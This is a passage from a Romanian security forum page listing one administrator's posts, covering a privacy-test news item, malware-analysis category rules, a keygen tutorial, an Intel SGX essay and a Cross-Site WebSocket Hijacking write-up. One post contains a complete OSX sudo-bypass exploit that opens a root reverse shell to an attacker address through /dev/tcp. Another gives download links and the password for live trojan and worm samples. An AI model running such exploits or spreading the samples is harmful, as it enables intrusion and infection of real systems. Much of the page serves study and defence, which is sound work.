Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. Gigantii internetului, Facebook, Twitter si Google au picat testul de confidentialitate a datelor, derulat de o companie specializata in securitatea online. Acest lucru a iesit la iveala dupa ce High-Tech Bridge, specializata in securitatea online, a initiat un test prin care sa puna la incercare politicile de confidentialitate a 50 dintre cele mai mari companii de pe internet, potrivit Daily Mail, citat de stirileprotv.ro Astfel, un mesaj privat continand o adresa web a fost trimis folosindu-se sistemele celor 50 de companii. Expertii High-Tech Bridge au asteptat apoi sa vada cine va pica in cursa si va accesa adresa web. La finalul celor zece zile de asteptare, sase din cele 50 de companii au accesat link-ul, amplasat intr-un mesaj privat. Printre cele sase se numara si cei trei giganti, Facebook, Twitter si Google. "Am descoperit ca au accesat link-ul care ar fi trebuit sa fie cunoscut doar de cel care a trimis mesajul si cel care l-a primit. Daca link-urile sunt accesate, nu putem fi siguri ca ce scriem in mesajele private nu este citit de cineva", a declarat seful High-Tech Bridge, Ilia Kolochenko. Reprezentantii Facebook si Twitter au refuzat sa comenteze rezultatele acestui test, in timp ce reprezentantii Google au afirmat ca accesarea link-ului nu reprezinta o problema. Sursa: Facebook, Twitter si Google au picat testul de confidentialitate. Cum te spioneaza cei trei giganti - www.yoda.ro
  2. L-am gasit pe laptop-ul unui prieten. Avea numele "qktier.exe" si "qktier.scr" si infecta stick-urile USB: creaza multe scurtaturi pe acolo si se copiaza cu multe nume. Arhiva contine 2 fisiere: 1. qktier.exe - Trojan.Win32.Agent.xsde 2. Video.exe - Email-Worm.Win32.Brontok.dk (ATENTIE! Are icon de folder dar e executabil!) Mi s-a parut interesant faptul ca atunci cand deschid cmd, autoruns sau autoruns cu un alt nume, da reboot la laptop. Sper sa am putin timp sa ma uit peste el, sunt curios cum "isi da seama" ca am deschis, probabil dupa classname-ul ferestrei, dar vreau sa fiu sigur. Atentie! Aceste fisier sunt MALWARE. NU LE EXECUTATI! Download: http://www.speedyshare.com/DKSkQ/RST-malware.rar http://www.girlshare.ro/32811826.3 http://fisierulmeu.ro/52CYWJ9X40D2/RST-malware-rar.html Parola arhivei: rst Incercati sa nu va infectati cu el, va poate da batai de cap.
  3. 1. How to Create a FUD Backdoor - Depinde ce presupune acel tutorial, daca e vorba despre "descarci crypterul x si apesi pe un buton", adica pentru script-kiddies, nu e permis. Daca e vorba despre o metoda de a obfusca sectiune .text, sau de a crypta sectiunile executabilului si despre cum se poate scrie stub-ul de decryptare, e bine-venit. 2. Infecting your Teachers and School Heads - Daca e vorba de "intra aici, descarca si executa asta pe calculatorul profesorului", nu are ce cauta aici. Daca e vorba despre scanarea retelei, gasirea PC-ului profesorului, obtinerea accesului printr-un exploit din Metasploit si mentinerea accesului prin diverse metode, e permis. Am dat doar cateva exemple. Nu vreau sa vad aici tutoriale de rahat, vreau sa fie doar lucruri de calitate si vreau ca incepatorii sa evite aceasta categorie. Am modificat primul post, am specificat detalii la intrebarea ta.
  4. Aceasta categorie este dedicata in exclusivitate analizei malware (termen generic pentru trojan, worm sau orice altceva)! Aici veti gasi: 1. Tutoriale despre analiza malware 2. Exemple de analiza malware 3. Tool-uri necesare pentru analiza malware 4. Cod sursa de malware, pentru a putea fi analizat 5. SAMPLE-uri de MALWARE! Cu alte cuvinte, VIRUSI (pe intelesul tuturor)! NU RULATI executabilele pe care le gasiti aici! Regula importanta: 1. La orice sample postat aici, se va specifica explicit faptul ca este MALWARE si se va explica faptul ca NU TREBUIE EXECUTAT! Categoria se adreseaza persoanelor care detin cel putin cunostinte de baza despre: - ce este un sandbox si ce face - ce e o masina virtuala si cum se foloseste - tool-uri utile: autoruns, Process Monitor, Process Explorer, Wireshark... - pericolele datorate infectarii cu malware Se pot posta programe care doriti sa fie analizate! Daca ati intalnit niste fisiere "suspecte" si vrei ca cineva sa arunce o privire pe ele, puteti posta aici, oferind cateva detalii despre cum ati intrat in posesia acelui fisier. ATENTIE! Nimeni nu o sa va garanteze faptul ca un fisier este infectat/malware sau nu! Cine are timp poate oferi cateva informatii despre fisier si poate SUGERA daca este malitios sau nu. Analiza completa a unui program este foarte complicata si dureaza foarte mult timp, astfel nu puteti stii cu certitudine ca un fisier este sigur sau nu. Fisierele pe care le vreti analizate le uploadati undeva intr-o arhiva cu parola. Pentru simplitate, folosti parola: "rst"! Sunt permise tutorialele despre "tehnici malware" cat timp totul este in scopuri educative (obligatoriu de specificat in post). Exista o conferinta internationala pe tema dezvoltarii malware, Malcon, personal nu vad de ce am opri lumea sa invete cum functioneaza cu adevarat un astfel de program.
  5. Xssf Framework : Key-Logging https://www.youtube.com/watch?v=aEvHHERho8E&feature=player_embedded Description: KEY LOGGING WITH XSSF Exploit - use auxillary/xssf/public/misc/logkeys Sursa: Xssf Framework : Key-Logging
  6. Car Immobilizer Hacking Description: Car manufacturers nicely illustrate what _not_ to do in cryptography. Immobilizers have for a long time increased the difficulty of stealing cars. Older immobilizer transponders defeated thieves by requiring non-trivial RF skills for copying keys. Current transponders go one step further by employing cryptographic functions with the potential of making car cloning as difficult as breaking long-standing mathematical problems. Cryptography, however, is only as strong as the weakest link of key management, cipher strength, and protocol security. This talk discusses weak links of the main immobilizer technologies and their evolution over time. For More Information : - SIGINT 2013 Sursa: Car Immobilizer Hacking
  7. Lsa (Local Security Authority) Secrets-Memory Analysis Description: In this video you will learn how forensics investigators can get the password from the registry and LSA secrets, using a memory dump and Using Volatility Framework. Sursa: Lsa (Local Security Authority) Secrets-Memory Analysis
  8. [h=1]Keygenning: Part I[/h]Souhail Hammou August 30, 2013 Introduction : A key generator or a Keygen is a computer program that will generate a valid « Product Serial or Key » in order to completely register a software. The key generation process may require a name or e-mail to generate the serial, in other cases where no name or e-mail is required the validity of the serial may be checked by relying on hardware or using an algorithm that will play with the serial parts in order to determine if the provided key is correct or not. Different from patching and serial phishing, keygenning is defined as one of the hardest cracking techniques based on the fact that when coding, a working keygen you need to fully understand how the serial checking algorithm is working. This algorithm may relay on cryptography for instance MD5 hashing. So after understanding how the serial checking algorithm works, the reverser must code a computer program in thier favorite programming language that will generate a valid key, serial or license for the targeted software. If the software requires a name or e-mail and they are involved in the generation algorithm inside the targeted software, the reverser has many ways to code a keygen : one of the simplest is to program a keygen that will relay on the SAME instructions used by the software to generate the serial. I think that this is what we call a « Ripped Keygen » . In my point of view, I don’t think that this is a good practice of keygenning because in many cases it’s similar to a copy/paste. The best thing that can be done is coding an « Unripped Keygen », that will do the same but using a different set of instructions which will make you learn far better than ripping the keygeneration routine itself. I – KeygenMe : A keygenMe is a computer program completely made by reververs for other reversers, the only accepted solution for the KeygenMe is coding a valid keygen that will generate a valid serial or key according to what the keygenMe needs. To make it « fun » and interesting I managed to code a KeygenMe in my favorite programming langage X86 assembly / MASM syntax with a serial checking algorithm that you will see in details, later in this article. The KeygenMe and Keygen download links are in the references below. So I’ll pretend that I have Zero-knowledge about this KeygenMe and start from the examination until completely coding a Keygen. Let’s get started. Examining the KeygenMe : First of all, before starting to debug the KeygenMe you have to see what it demands from you: is it a serial ? A license file ? … etc Let’s open it and see what it needs : As you can clearly see, the KeygenMe needs our email address and a serial number. After entering a random WRONG serial the KeygenMe prints “Invalid Serial”. With Zero-knowledge you can’t actually guess if, the serial is generated based on the e-mail or not, only debugging this KeygenMe will get you the answer. So let’s open it inside Immunity and see what it has for us. I will start by checking what happens exactly after providing our e-mail to the KeygenMe: Click to Enlarge As you see, I tried to write short comments in front of important instructions. So what the KeygenMe does with our e-mail, is checking for its validity by seeing if it has the “@” sign in it and if there are at least 4 characters before the @ sign. Keep in mind that we’re not sure that the mail is used or not .Simply because it’s still stored at memory address 00403150. As the serial checking routine is a little bigger to be shown in one image, I will explain it to you part by part. Let’s see what the KeygenMe dœs directly after providing an input string, as you saw this input « 111122223333444455556666 » won’t get us anywhere. Let’s discover why : Click to Enlarge You can clearly see that the KeygenMe will check the input length, check if the string « ITS– » is present then locate 3 more dashes (–). As a result the serial general format should be given by the user this way : ITS-XXXX-XXXX-XXXX-XXXX, where ITS– is a harcoded string and X’s are unknown for us in the mean time. Now let’s start analyzing the next part : Click to Enlarge This set of instructions will simply skip the first DWORD which is “ITS-” and place each of the fourth different parts of the serial in an seperated memory location. For example the first part of the serial which will come after the hardcoded string, will be placed in a DWORD that is located in memory address 004051A8. We can suppose now that the serial checking algorithm will deal with each part of the serial alone, but we cannot judge yet because the algorithm may also link between those different parts. Anyway, let’s see what the next instructions are dealing with: Click to Enlarge In this phase, we started to deal with the serial checking algorithm. The serial that we have to provide must have 5 parts. Each part is recognized by a dash “-”. I said that the first part is hardcoded so in the algorithm the KeygenMe will directly start dealing with the second part. Let’s suppose that we provided this serial to the KeygenMe : ITS-1111-2222-3333-4444 If we had provided this serial, all the previous checks would have gone right. But this check wouldn’t have gone right because simply the 2nd part of the serial which is “1111? is WRONG. Let’s try to see what’s wrong and how can we fix that. As you can clearly see the KeygenMe works on moving the DWORD in the first part into EAX register, our input is “1111? so the EAX register should hold “31313131? which is the translation of “1111? from ASCII into a Hexadecimal format. Now twill substract « 30303030 » from EAX resulting in « 01010101 ». This value will replace the existing value in 004051A8. Now, the KeygenMe will try to do a simple addition between those bytes : 01 + 01 + 01 + 01 = 04 which is not 10h, that’s why we will jump into the “invalid serial” message. For the mean time you just need to note what you discovered here in a Notepad or somewhere you can remember it and move on to the third part of the checking routine. Click to Enlarge The 3rd part checking is quite different from the second one, it will simply compare the first character of our input to the letter “O”, then adds the next two bytes to the 4Fh (which is O in hex) and substracts the last byte from the addition result, the final result should be held in BL and equals 8Fh. Note: You can conclude that in this part it’s preferable to use Capital letters starting in hexadecimal from 41h to 5Ah in the serial (using numbers is not a bad idea either). For now, let’s move on to the fourth part checking : Click to Enlarge The 4th part checking set of instructions are similar to the second part, the only difference that you can see is that 2 is substracted from the last byte of the 4th part of the serial. Then the resulted value is added to the previous total. The final result should be 10h. E.I : If the user managed to pass all the previous checks with correct input or by patching jumps which is RESTRICTED in a KeygenMe. Here’s what will happen with the input “3333? : 33333333 – 30303030 = 03 03 03 03. Then : 03 + 03 + 03 = 09, and the substraction : 03 – 02 = 01. And the addition finally : 09 + 01 = 0Ah which is different from 10h, the jump will be then taken to the invalid serial message routine. Let’s see what the last check has for us: Click to Enlarge So, the same thing as the second part of the serial is happening here, the only difference is that the resulted value should be 12h instead of 10h. Then we have the conditional jump that will take us to the unwanted message when the resulted value differs from 12h. Now as we discovered together how the KeygenMe works on checking the validity of our serial, part by part and that the e-mail has no relation at all with the serial checking algorithim let’s go and code a keygen for it. II – Writing a Valid Keygen: So now, we need to program a Keygen that will generate an infinite number of Random serials.So you will have to write it in your favorite programming language. So to practice you are freely welcome to write the Keygen in any language you want and why not e-mail me your keygen to check it. Random Value Generation : One of the problems that you may face is how to code a keygen that will make you able to generate random characters for the serial. Well, there are several ways to achieve this and I’m about to introduce you some techniques : - GetLocalTime : This API will work on getting the current date and time, the interesting thing here is taking advantage of seconds or milliseconds (which occupy the sixth and the seventh words in the SYSTEMTIME structure) in order to generate a value especially if you’re working on a multiple serial generation. -GetTickCount : This is also a Win32 API that will retreive the milliseconds that were elapsed since the system was started (MSDN), GetTickCount will return a 32bits value to eax register. We can take advantage of this returned value especially AL or AH if we’re interested in one byte. In addition, setting conditions in the code is obligatory to get the value in a specific range (Printable Characters). -Other Methods : There are many ways to generate random values, some of them are related to cryptography. Windows is providing CryptGenRandom function for this purpose. Random Value Generation & Looping: Let’s get back to the point where I said you must provide certain conditions when generating a random value, there are two cases here when using GetTickCount API : The first one is obligatory, you’ll need to set a loop where the return value in AL or AH (if you’re interested in generating 1 byte) must be printable and/or in a specific ASCII characters range. The second one is decided by the serial checking algorithm that will show you if there are additional conditions for example the Software will not accept a serial where two identical consecutive characters are provided. This is the main reason why the serial generation process may take some seconds, because the keygen will keep looping until the right value is found relaying on conditions provided. We can consider this as a drawback. However, we can turn this into a positive point in our keygen with a message that is telling the user to wait for a couple seconds until the valid serial is generated. Serial Generation : In the KeygenMe that we analyzed you noticed that each part of the serial (4 characters in each part) is checked alone, and also it depends on simple math operations like addition and substraction. So to generate a valid part of the serial we will need to set 3 random characters and solve a simple equation to determine the missing characters to get a valid serial. Now, you may realize that additional loops must take place which will check if the result of the equation is also a printable ASCII character or not. The Keygen: Here is the Keygen source code written in x86 ASM / MASM32 syntax (some code is additional in the serial checking algorithm like trying to avoid two consecutive identical characters): The serial generation steps are well commented step by step : https://gist.github.com/SouhailHammou/0746b573136ba3ca0e67 Running the keygen : Assemble then link the keygen’s source code and run it . You will be able to generate multiple valid serial numbers for the KeygenMe by pressing Return key. Click to Enlarge III – Conclusion : In this article you were able to see how to analyze a Serial Checking Algorithm and code a valid key generator that will help you generate different serial numbers. No hashing or cryptography was present in this KeygenMe and the algorithm was quite simple. In the next part I will try to introduce a more harder KeygenMe with a complete tutorial on how to code a valid Keygen for it. References: KeygenMe & Keygen download : IS-KeyGenning Part1.zip Keygen Source Code : https://gist.github.com/SouhailHammou/0746b573136ba3ca0e67 GetTickCount function (Windows) SYSTEMTIME structure (Windows) Keygen - Wikipedia, the free encyclopedia Crackme - Wikipedia, the free encyclopedia Sursa: Keygenning: Part I
  9. [h=3]Thoughts on Intel's upcoming Software Guard Extensions (Part 1)[/h] Intel Software Guard Extensions (SGX) might very well be The Next Big Thing coming to our industry, since the introduction of Intel VT-d, VT-x, and TXT technologies in the previous decade. It apparently seem to promise what so far has never been possible – an ability to create a secure enclave within a potentially compromised OS. It sounds just too great, so I decided to take a closer look and share some early thoughts on this technology. Intel SGX – secure enclaves within untrusted world! Intel SGX is an upcoming technology, and there is very little public documents about it at the moment. In fact the only public papers and presentations about SGX can be found in the agenda of one security workshop that took place some two months ago. The three papers from Intel engineers presented there provide a reasonably good technical introduction to those new processor extensions. You might think about SGX as of a next generation of Intel TXT – a technology that has never really took off, and which has had a long history of security problems disclosed by certain team of researchers Intel TXT has also been perhaps the most misunderstood technology from Intel – in fact many people thought about TXT as if it already could provide security enclaves within untrusted OS – this however was not really true (even ignoring for our multiple attacks) and I have spoke and wrote many times about that in the past years. It's not clear to me when SGX will make it to the CPUs that we could buy in local shops around the corner. I would be assuming we're talking about 3-5 years from now, because the SGX is not even described in the Intel SDM at this moment. Intel SGX is essentially a new mode of execution on the CPU, a new memory protection semantic, plus a couple of new instructions to manage this all. So, you create an enclave by filling its protected pages with desired code, then you lock it down, measure the code there, and if everything's fine, you ask the processor to start executing the code inside the enclave. Since now on, no entity, including the kernel (ring 0) or hypervisor (ring “-1”), or SMM (ring “-2”) or AMT (ring “-3”), has no right to read nor write the memory pages belonging to the enclave. Simple as that! Why have we had to wait so long for such technology? Ok, it's not really that simple, because we need some form of attestation or sealing to make sure that the enclave was really loaded with good code. The cool thing about an SGX enclave is that it can coexist (and so, co-execute) together with other code, such all the untrusted OS code. There is no need to stop or pause the main OS, and boot into a new stub mini-OS, like it was with the TXT (this is what e.g. Flicker tried to do, and which was very clumsy). Additionally, there can be multiple enclaves, mutually untrusted, all executing at the same time. No more stinkin' TPMs nor BIOSes to trust! A nice surprise is that SGX infrastructure no longer depends on the TPM to do measurements, sealing and attestation. Instead Intel has a special enclave that essentially emulates the TPM. This is a smart move, and doesn't decrease security in my opinion. It surely makes us now trust only Intel vs. trusting Intel plus some-asian-TPM-vendor. While it might sound like a good idea to spread the trust between two or more vendors, this only really makes sense if the relation between trusting those vendors is expressed as “AND”, while in this case the relation is, unfortunately of “OR” type – if the private EK key gets leaked from the TPM manufacture, we can bypass any remote attestation, and no longer we need any failure on the Intel's side. Similarly, if Intel was to have a backdoor in their processors, this would be just enough to sabotage all our security, even if the TPM manufacture was decent and played fair. Because of this, it's generally good that SGX allows us to shrink the number of entities we need to trust down to just one: Intel processor (which, these days include the CPUs as well as the memory controller, and, often, also a GPU). Just to remind – today, even with a sophisticated operating system architecture like those we use in Qubes OS, which is designed with decomposition and minimizing trust in mind, we still need to trust the BIOS and the TPM, in addition to the processor. And, of course, because SGX enclaves memories are protected against any other processor mode's access, so SMM backdoor no longer can compromise our protected code (in contrast to TXT, where SMM can subvert a TXT-loaded hypervisor), nor any other entity, such as the infamous AMT, or malicious GPU, should be able to do that. So, this is all very good. However... Secure Input and Output (for Humans) For any piece of code to be somehow useful, there must be a secure way to interact with it. In case of servers, this could be implemented by e.g. including the SSL endpoint inside the protected enclave. However for most applications that run on a client system, ability to interact with the user via screen and keyboard is a must. So, one of the most important questions is how does Intel SGX secures output to the screen from an SGX enclave, as well as how does it ensure that the input the enclave gets is indeed the input the user intended? Interestingly, this subject is not very thoroughly discussed in the Intel papers mentioned above. In fact only one paper briefly mentions Intel Protected Audio Video Path (PVAP) technology that apparently could be used to provide secured output to the screen. The paper then references... a consumer FAQ onBlueRay Disc Playback using Intel HD graphics. There is no further technical details and I was also unable to find any technical document from Intel about this technology. Additionally this same paper admits that, as of now, there is no protected input technology available, even on prototype level, although they promise to work on that in the future. This might not sound very surprising – after all one doesn't need to be a genius to figure out that the main driving force behind this whole SGX thing is the DRM, and specifically protecting Holywwod media against the pirate industry. This would be nothing wrong in itself, assuming, however, the technology could also have some other usages, that could really improve security of the user (in contrast to the security of the media companies). We shall remember that all the secrets, keys, tokens, and smart-cards, are ultimately to allow the user to access some information. And how does people access information? By viewing in on a computer screen. I know, I know, this so retro, but until we have direct PC-brain interfaces, I'm afraid that's the only way. Without properly securing the graphics output, all the secrets can be ultimately leaked out. Also, how people command their computers and applications? Well, again using this retro thing called keyboard and mouse (touchpad). However secure our enclave might be, without secured input, the app would not be able to distinguish intended user input from simulated input crafted by malware. Not to mention about such obvious attacks as sniffing of the user input. Without protected input and output, SGX might be able to stop the malware from stealing the user's private keys for email encryption or issuing bank transactions, yet the malware will still be able to command this super-secured software to e.g. decrypt all the user emails and later steal the screenshots of all the plaintext messages (with a bit of simple programming, the screenshot's could be turned back into nice ASCII text for saving on bandwidth when leaking them out to a server in Hong Kong), or better yet, perhaps just forward them to an email address that the attacker controls (perhaps still encrypted, but using the attackers key). But, let's ignore for a moment this “little issue” of lack of protected input, and lack of technical documentation on how secure graphics output is really implemented. Surely it is thinkable that protected input and output could be implemented in a number of ways, and so let's hope Intel will do it, and will do right. We should remember here, that whatever mechanism Intel is going to use to secure the graphics and audio output, it surely will be an attractive target of attacks, as there is probably a huge money incentive for such attacks in the film illegal copying business. Securing mainstream client OSes and why this is not so simple? As mentioned above, for SGX enclaves to be truly meaningful on client systems we need protected input and output, to and from the secured enclaves. Anyway, lets assume for now that Intel has come up with robust mechanisms to provide these. Let's now consider further, how SGX could be used to turn our current mainstream desktop systems into reasonably secure bastions. We start with a simple scenario – a dedicated application for viewing of incoming encrypted files, say PDFs, performing their decryption and signature verification., and displaying of the final outcome to the user (via protected graphics path). The application takes care about all the key management too. All this happens, of coruse, inside an SGX enclave(s). Now, this sounds all attractive and surely could be implemented using the SGX. But what about if we wanted our secure document viewer to become a bit more than just a viewer? What if we wanted a secure version of MS Word or Excel, with its full ability to open complex documents and edit them? Well it's obviously not enough to just put the proverbial msword.exe into a SGX enclave. It is not, because the msword.exe makes use of million of other things that are provided by the OS and 3rd libraries, in order to perform all sorts of tasks it is supposed to do. It is not a straightforward decision to draw a line between those parts that are security sensitive and those that are not. Is font parsing security critical? Is drawing proper labels on GUI buttons and menu lists security critical? Is rendering of various objects that are part of the (decrypted) document, such as pictures, security critical? Is spellchecking security critical? Even if the function of some of a subsystem seem not security critical (i.e. not allows to easily leak the plaintext document out of the enclave), let's not forget that all this 3rd party code would be interacting very closely with the enclave-contained code. This means the attack surface exposed to all those untrusted 3rd party modules will be rather huge. And we already know it is rather not possible to write a renderer for such complex documents as PDFs, DOCs, XLS, etc, without introducing tons of exploitable bugs. And these attack are not coming now from the potentially malicious documents (against those we protect, somehow, by parsing only signed document from trusted peers), but are coming from the compromised OS. Perhaps it would be possible to take Adobe Reader, MS Word, Powerpoint, Excel etc, and just rewrite every of those apps from scratch in a way that they were properly decomposed into sensitive parts that execute within SGC enclave(s), and those that are not-sensitive and make use of all the OS-provided functionality, and further define clean and simple interfaces between those parts, ensuring the “dirty” code cannot exploit the sensitive code. Somehow attractive, but somehow I don't see this happening anytime soon. But, perhaps, it would be easier to do something different – just take the whole msword.exe, all the DLLs it depends on, as well as all the OS subsystems it depends on, such as the GUI subsystem, and put all of this into an enclave. This sounds like a more rational approach, and also more secure. Only notice one thing – we just created... a Virtual Machine with Windows OS inside and the msword.exe that uses this Windows OS.. Sure, it is not a VT-x-based VM, it is an SGX-based VM now, but it is largely the same animal! Again, we came to the conclusion why the use of VMs is suddenly perceived as such an increase in security (which some people cannot get, claiming that introducing VM-layer only increases complexity) – the use of VMs is profitable because of one of thing: it suddenly packs all the fat libraries- and OS-exposed APIs and subsystems into one security domain, reducing all the interfaces between this code in the VM and the outside world. Reducing of the interfaces between two security domains is ALWAYS desirable. But our SGX-isolated VMs have one significant advantage over the other VM technologies we got used to in the last decade or so – namely those VMs can now be impenetrable to any other entity outside of the VM. No kernel or hypervisor can peek into its memory. Neither can the SMM, AMT, or even a determined physical attacker with DRAM emulator, because SGX automatically encrypts any data that leave the processor, so everything that is in the DRAM is encrypted and useless to the physical attacker. This is a significant achievement. Of course SGX, strictly speaking, is not a (full) virtualization technology, it's not going to replace VT-x.. But remember we don't always need full virtualization, like VT-x, often we can use paravirtualization and all we need in that case is a good isolation technology. For examaple, Xen uses paravirtualization for Linux-based PV VMs, and uses good-old ring3/ring0 separation mechanism to implement this, and the level of isolation of such PV domains on Xen is comparable to the isolation of HVMs, which are virtualized using VT-x. To Be Continued In the next part of this article, we will look into some interesting unconventional uses of SGX, such as creating malware that cannot be reversed engineered, or TOR nodes or Bitcoin mixers that should be reasonably trusted, even if we don't trust their operators. Then we will discuss how SGX might profoundly change the architecture of the future operating systems, and virtualization systems, in a way that we will no longer need to trust (large portions of) their kernels or hypervisors, or system admins (Anti Snowden Protection?) And, of course, how our Qubes OS might embrace this technology in the future. Finally, we should discuss the important issue of whether this whole SGX, while providing many great benefits for system architects, should really be blindly trusted? What are the chances of Intel building in backdoors there and exposing those to the NSA? Is there any difference in trusting Intel processors today vs. trusting the SGX as a basis of security model of all software in the future? Posted by Joanna Rutkowska at Friday, August 30, 2013 Sursa: The Invisible Things Lab's blog: Thoughts on Intel's upcoming Software Guard Extensions (Part 1)
  10. #!/usr/bin/python# Original MSF Module: # https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudo_password_bypass.rb ################################################################################################### # Exploit Title: OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell # Date: 08-27-2013 # Exploit Author: David Kennedy @ TrustedSec # Website: https://www.trustedsec.com # Twitter: @Dave_ReL1K # Tested On: OSX 10.8.4 # # Reference: http://www.exploit-db.com/exploits/27944/ # # Example below: # trustedsec:Desktop Dave$ python osx_esc.py # [*] Exploit has been performed. You should have a shell on ipaddr: 127.0.0.1 and port 4444 # # attacker_box:~ Dave$ nc -l 4444 # bash: no job control in this shell # bash-3.2# ################################################################################################### import subprocess # IPADDR for REVERSE SHELL - change this to your attacker IP address ipaddr = "192.168.1.1" # PORT for REVERSE SHELL - change this to your attacker port address port = "4444" # drop into a root shell - replace 192.168.1.1 with the reverse listener proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE) proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port)) print """ ############################################################### # # OSX < 10.8.4 Local Root Priv Escalation Root Reverse Shell # # Written by: David Kennedy @ TrustedSec # Website: https://www.trustedsec.com # Twitter: @Dave_ReL1K # # Reference: http://www.exploit-db.com/exploits/27944/ ############################################################### """ print " [*] Exploit has been performed. You should have a shell on ipaddr: %s and port %s" % (ipaddr,port)
  11. Ce parere aveti despre o categorie special dedicata "malware"-ului? Mai exact: 1. Sample-uri de malware (ideea mi-a venit cand, avand laptopul unui prieten, am gasit o dracie interesanta care rebooteaza claculatorul cand vrei sa deschizi cmd sau autoruns, care "crapa", nu stiu cum, Task Manager, cand vrei sa inchizi procese si multe altele) - cu link de unde le putem descarca si analiza. 2. Analiza malware: cand mai avem timp, poate unii dintre noi ne mai uitam peste astfel de programele si vedem ce fac 3. Postare de programe pentru a fi analizate: aici oricine, zic eu minim 100 de posturi, va posta un program in care nu are incredere si "ne vom uita peste el". Nu cred ca va sta nimeni sa ii faca Reverse Engineering, dar o analiza rapida: se pune la startup, se autocopiaza, trimite cine stie ce parole de Firefox.. se poate face 4. Articole pe aceasta tema: articole scrise de alte persoane in care prezinta analiza unor malware, lucruri noi si metode interesante de a functiona... Si nu se rezuma doar la executabile, diverse applet-uri Java, sau cod Javascript obfuscat care ascunde cine stie ce, sunt binevenite 5. Chiar si coduri sursa de malware peste care ne-am putea uita ar fi ok Sunt doar cateva idei, ce parere aveti? Ce alte sugestii aveti pentru o astfel de categorie? Votati daca s-ar merita sa se faca sau nu.
  12. Cross-Site WebSocket Hijacking (CSWSH) The relatively new HTML5 WebSocket technique to enable full-duplex communication channels between browsers and servers is retrieving more and more attention from developers as well as security analysts. Using WebSockets developers can exchange text and binary messages pushed from the server to the browser as well as vice versa. During some experiments and pentests with WebSocket backed applications in the last few months I came across a scenario where developers might use WebSockets in a way to open up their applications to a vulnerability I call Cross-Site WebSocket Hijacking (CSWSH), which I will present in this short blog post. The protocol upgrade In order to create the full-duplex communication channel the WebSocket protocol requires a handshake (carried out over http:// or https://) to switch towards a WebSocket protocol. This handshake effectively upgrades the communication protocol to ws:// (or wss:// for SSL protected channels). But this upgrade phase is also a potential target to attack and Achilles' heel of using WebSockets inside an application that deals with non-public data, because it kind of bridges/transfers the HTTP(S)-based communication towards the WS(S)-based WebSocket protocol. The typical lifecycle of a WebSocket interaction between client & server goes as follows: Client initiates a connection by sending an HTTP(S) WebSocket handshake request. Server replies with a handshake response (all handled by the web application server transparently to the application) and sends a response status code of 101 Switching Protocols. From that point on both browser and server communicate using WebSocket API with a completely symmetrical connection (each party can send and retrieve text and binary messages). On the browser level this is defined by W3's HTML5 WebSocket API specification and at protocol level via RFC 6455 "The WebSocket Protocol". Let's take a closer look at this handshake request and inspect the request headers of such a handshake to upgrade the protocol to WebSockets (of an imaginary stock portfolio management application, which uses WebSockets to quickly push new stock quotes to logged-in users as well as retrieve stock orders from them): "GET /trading/ws/stockPortfolio HTTP/1.1" Host: www.some-trading-application.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Firefox/23.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Sec-WebSocket-Version: 13 Origin: https://www.some-trading-application.com Sec-WebSocket-Key: x7nPlaiHMGDBuJeD6l7y/Q== [COLOR=#ff0000]Cookie: JSESSIONID=1A9431CF043F851E0356F5837845B2EC[/COLOR] Connection: keep-alive, Upgrade Pragma: no-cache Cache-Control: no-cache Upgrade: websocket As you can see from the request headers of the HTTP(S) handshake request, the authentication data (in this example the Cookie header) is sent along with the upgrade handshake. The same would be true for HTTP-Authentication data. Both is correct behaviour of the browsers according to the aforementioned specification and RFC. Upon successful WebSocket handshake the server replies with the 101 Switching Protocols status code and from then on the ws:// or wss:// based connection is established between browser and server. The header Sec-WebSocket-Key is part of the browser/server handshake internals (to verify that the server has read and understood the request) and is automatically created by and taken care of the browser initiating the WebSocket request. Regarding client authentication during this handshake/upgrade phase the RFC 6455 reads as follows: This protocol doesn't prescribe any particular way that servers can authenticate clients during the WebSocket handshake. The WebSocket server can use any client authentication mechanism available to a generic HTTP server, such as cookies, HTTP authentication, or TLS authentication. RFC 6455 "The WebSocket Protocol", chapter 10.5 WebSocket Client Authentication This means to developers that they can use for example cookies or HTTP-Authentication to authenticate the WebSocket handshake request, as if it was a regular HTTP(S) web application request. Hijacking it cross-site Now let's consider what happens when a developer follows this well-known style of using session cookies to authenticate the WebSocket handshake/upgrade request within a logged-in (sensitive) part of a web application: Because WebSockets are not restrained by the same-origin policy, an attacker can easily initiate a WebSocket request (i.e. the handshake/upgrade process) from a malicious webpage targeting the ws:// or wss:// endpoint URL of the attacked application (the stock service in our example). Due to the fact that this request is a regular HTTP(S) request, browsers send the cookies and HTTP-Authentication headers along, even cross-site. Take a look at the WebSocket handshake/upgrade request when issued from a malicious webpage cross-site (visited by the victim while logged-in with our stock trading application). Here the WebSocket endpoint wss://www.some-trading-application.com/trading/ws/stockPortfolio is accessed from a malicious webpage at https://www.some-evil-attacker-application.com "GET /trading/ws/stockPortfolio HTTP/1.1" Host: www.some-trading-application.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Firefox/23.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Sec-WebSocket-Version: 13 [COLOR=#0000ff]Origin: https://www.some-evil-attacker-application.com[/COLOR] Sec-WebSocket-Key: hP+ghc+KuZT2wQgRRikjBw== [COLOR=#ff0000]Cookie: JSESSIONID=1A9431CF043F851E0356F5837845B2EC[/COLOR] Connection: keep-alive, Upgrade Pragma: no-cache Cache-Control: no-cache Upgrade: websocket As you can see, the browser sends the authentication information (in this example the session cookie) along with the WebSocket handshake/upgrade request. This is very similar to a Cross-Site Request Forgery (CSRF) attack scenario. But in the WebSocket scenario this attack can be extended from a write-only CSRF attack to a full read/write communication with a WebSocket service by physically establishing a new WebSocket connection with the service under the same authentication data as the 